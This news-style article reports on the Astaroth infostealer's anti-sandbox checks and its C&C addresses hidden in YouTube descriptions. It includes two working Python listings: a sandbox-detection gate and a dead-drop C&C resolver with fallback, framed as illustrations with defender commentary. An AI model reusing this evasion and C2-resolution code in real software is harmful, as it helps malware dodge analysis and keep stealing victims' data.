Astaroth infostealer trojan hides command servers in YouTube channel descriptions

Over the past two years, Astaroth has emerged as one of the more prominent information stealers, harvesting personally identifiable information including victims' payment card data. According to security researchers, Astaroth is one of today's stealthiest malware strains, carrying a slew of anti-analysis and anti-sandbox checks designed to keep analysts and automated sandboxes from detecting and examining its payload.

So far, the malware has only been observed operating in Brazil, but if the trend continues, Astaroth will likely spread to other countries. It was first noticed by IBM's security researchers in Brazil in September 2018, and Cybereason researchers have since analyzed it. Microsoft's security team also took notice and tracked its evolution in two separate blog posts, in July 2019 and March 2020.

In the more recent Microsoft blog post, the researchers detail how Astaroth gained new features and new stealth capabilities.

Cisco Talos has also published a new report which says that Astaroth is still evolving and will, before long, spread to other parts of the world. The trojan uses email campaigns for distribution, fileless execution, and living-off-the-land binaries (LOLBins) for infection.

Since then, Astaroth has gained two major new stealth techniques. The first is a large collection of anti-analysis and anti-sandbox checks. The malware runs these checks before unpacking its payload, to make sure it is running on a real, in-use computer rather than inside a sandbox or analysis environment, so that no malicious behaviour is exposed to an analyst's tooling.

By refusing to run inside sandboxes, Astaroth avoids having its behaviour recorded and analyzed. The longer it takes security researchers to extract indicators and build detections for it, the longer it can keep infecting unaware victims. “Astaroth is evasive by nature and its authors have taken every step to ensure its success,” the Cisco Talos team said.

“They have implemented a complex maze of anti-analysis and anti-sandbox checks to prevent the malware from being detected or analyzed. Starting with effective and impactful lures, to layer after layer of obfuscation, all before any malicious intent was ever exposed. Then it finally proceeds through a rigorous gauntlet of checks for the tools and techniques of both researchers and sandbox technologies alike. This malware is, by design, painful to analyze,” the researchers added.
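The article does not list the individual checks Astaroth runs, so the following is an added example, not the trojan's own code: a generic anti-sandbox gate of the kind commodity malware uses, with signals and thresholds that are assumptions chosen for illustration. The host state is passed in as a snapshot object (constructed sample data, not real telemetry) so the logic runs offline and deterministically.

```python
"""Generic anti-analysis / anti-sandbox gate of the kind the article describes.

Added example, not Astaroth's code: the checks, thresholds and name lists
below are assumptions typical of commodity malware, not the trojan's actual
ones. Host state is supplied as a snapshot so the gate can be exercised offline.
"""
from dataclasses import dataclass
from typing import List

# Process names commonly associated with analysis tooling or VM guest tools (assumed list).
ANALYSIS_PROCESSES = {
    "wireshark.exe", "procmon.exe", "procexp.exe", "x64dbg.exe",
    "ida64.exe", "ollydbg.exe", "fiddler.exe", "vboxservice.exe", "vmtoolsd.exe",
}
# MAC address prefixes (OUIs) registered to virtualization vendors (assumed list).
VM_MAC_PREFIXES = ("00:05:69", "00:0c:29", "00:50:56", "08:00:27", "00:15:5d")


@dataclass
class HostSnapshot:
    cpu_count: int
    ram_gib: float
    disk_gib: float
    uptime_seconds: int
    processes: List[str]
    mac_addresses: List[str]
    recent_documents: int  # entries in the user's recent-documents list


def sandbox_signals(snap: HostSnapshot) -> List[str]:
    """Return the name of every sandbox indicator the snapshot trips."""
    signals = []
    # Analysis VMs are typically provisioned small and rebooted for each sample.
    if snap.cpu_count < 2:
        signals.append("few_cpus")
    if snap.ram_gib < 2.0:
        signals.append("low_ram")
    if snap.disk_gib < 60.0:
        signals.append("small_disk")
    if snap.uptime_seconds < 10 * 60:
        signals.append("short_uptime")
    # A real user's machine accumulates history; a fresh sandbox image has none.
    if snap.recent_documents == 0:
        signals.append("no_user_history")
    # Visible monitoring or guest-tools processes.
    hits = {p.lower() for p in snap.processes} & ANALYSIS_PROCESSES
    if hits:
        signals.append("analysis_tools:" + ",".join(sorted(hits)))
    # Virtual NICs carry vendor-specific OUIs.
    if any(m.lower().startswith(VM_MAC_PREFIXES) for m in snap.mac_addresses):
        signals.append("vm_mac")
    return signals


def looks_like_sandbox(snap: HostSnapshot, threshold: int = 2) -> bool:
    """Gate: refuse to unpack the payload when enough indicators fire together.

    A threshold (rather than any single hit) keeps one odd-but-legitimate host
    property, such as a small laptop disk, from aborting the infection.
    """
    return len(sandbox_signals(snap)) >= threshold


# Constructed snapshots for demonstration (not real telemetry).
SANDBOX_HOST = HostSnapshot(
    cpu_count=1, ram_gib=1.0, disk_gib=40.0, uptime_seconds=95,
    processes=["explorer.exe", "procmon.exe", "vboxservice.exe"],
    mac_addresses=["08:00:27:12:34:56"], recent_documents=0,
)
REAL_HOST = HostSnapshot(
    cpu_count=8, ram_gib=16.0, disk_gib=512.0, uptime_seconds=3 * 86400,
    processes=["explorer.exe", "chrome.exe", "outlook.exe"],
    mac_addresses=["3c:22:fb:aa:bb:cc"], recent_documents=37,
)

if __name__ == "__main__":
    for name, snap in (("sandbox", SANDBOX_HOST), ("real", REAL_HOST)):
        print(name, looks_like_sandbox(snap), sandbox_signals(snap))
```

Read from the defender's side, the same list is a checklist of what an analysis sandbox has to fake (several cores, realistic uptime and disk, user history, hidden guest tools, non-vendor MACs) before a sample that gates itself this way will reveal its payload.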

Astaroth now hides Command and Control servers in YouTube descriptions

The second major update is that Astaroth now hides its command and control (C&C) server addresses in the description field of YouTube videos posted on Brazilian users' channels. The image above illustrates such a description. This makes it harder for security researchers to recover the C&C addresses from the sample itself and to analyze how the malware communicates with its operators.

According to Talos, once Astaroth has infected a victim, the trojan reaches out to an operator-controlled YouTube channel and reads the description of a video on that channel. That field contains encrypted, base64-encoded text holding the URLs of the current command and control server. Astaroth decodes it, connects to the server and uploads the data stolen from the victim. Hiding the location of a C&C server on YouTube is not new: the Janicab malware used the technique in 2015, and the Stantinko trojan did so in 2019.

However, Astaroth goes one step further than those two malware families: it now has redundancy. If the video carrying the C&C description is taken down, the malware can fall back to another video whose description carries the same information, so a single takedown does not cut it off from its operators.
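The two paragraphs above describe a dead-drop resolver: pull a base64 blob out of a video description, decrypt it into a list of C&C URLs, and fall through to the next video when one is gone. The following is an added example of that mechanism, not Astaroth's code. The page gives neither the cipher, the key nor the delimiters the trojan uses, so the `|||` markers and the repeating-key XOR with the key `astaroth-demo` are assumptions for illustration only; the "fetched" descriptions are constructed strings and nothing touches the network.

```python
"""Resolving C&C URLs from a YouTube-style description dead drop, with fallback.

Added example, not Astaroth's code. Assumptions (not from the article):
the payload sits between '|||' markers, and "encrypted" means repeating-key
XOR under a toy key. Descriptions are constructed inline; no network access.
"""
import base64
import re
from typing import List, Optional, Tuple

MARK = "|||"               # assumed delimiter around the payload
KEY = b"astaroth-demo"     # assumed toy key, NOT the real one
PAYLOAD_RE = re.compile(re.escape(MARK) + r"([A-Za-z0-9+/=]+)" + re.escape(MARK))


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so it both 'encrypts' and 'decrypts'."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_dead_drop(urls: List[str]) -> str:
    """Operator side: newline-join the URLs, XOR, base64, wrap in markers.

    Only used here to build the constructed sample descriptions.
    """
    blob = base64.b64encode(xor_bytes("\n".join(urls).encode(), KEY)).decode()
    return f"{MARK}{blob}{MARK}"


def extract_c2_urls(description: Optional[str]) -> Optional[List[str]]:
    """Implant side: locate the blob in an arbitrary description and decode it.

    Returns None when the video is gone (description is None), when no
    marked blob is present, or when the blob does not decode to URLs.
    """
    if description is None:
        return None
    match = PAYLOAD_RE.search(description)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        plain = xor_bytes(raw, KEY).decode("utf-8")
    except ValueError:  # bad base64 or non-UTF-8 after XOR (wrong key / corrupted blob)
        return None
    urls = [line.strip() for line in plain.splitlines() if line.strip()]
    if not urls or not all(u.startswith(("http://", "https://")) for u in urls):
        return None
    return urls


def resolve_c2(videos: List[Tuple[str, Optional[str]]]) -> Optional[Tuple[str, List[str]]]:
    """Redundancy: walk the candidate videos in order; first decodable one wins."""
    for video_id, description in videos:
        urls = extract_c2_urls(description)
        if urls:
            return video_id, urls
    return None


# Constructed sample: three candidate videos on the operator's channel.
C2_URLS = ["https://c2-one.example/gate", "https://c2-two.example/gate"]
SAMPLE_VIDEOS = [
    ("vid-A", None),                                          # taken down
    ("vid-B", "Receita de brigadeiro! Inscreva-se no canal."),  # no payload
    ("vid-C", "Tour pela cidade.\n" + encode_dead_drop(C2_URLS) + "\nObrigado!"),
]

if __name__ == "__main__":
    print(resolve_c2(SAMPLE_VIDEOS))
```

For an analyst the same extractor, once the real key and markers are recovered from a sample, can be run over every video on the channel to enumerate the full set of fallback C&C addresses rather than only the one the implant happened to use.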

For now, Astaroth is active only in Brazil, but researchers say the malware's sophistication would allow its operators to spread to other parts of the world, especially the United States.
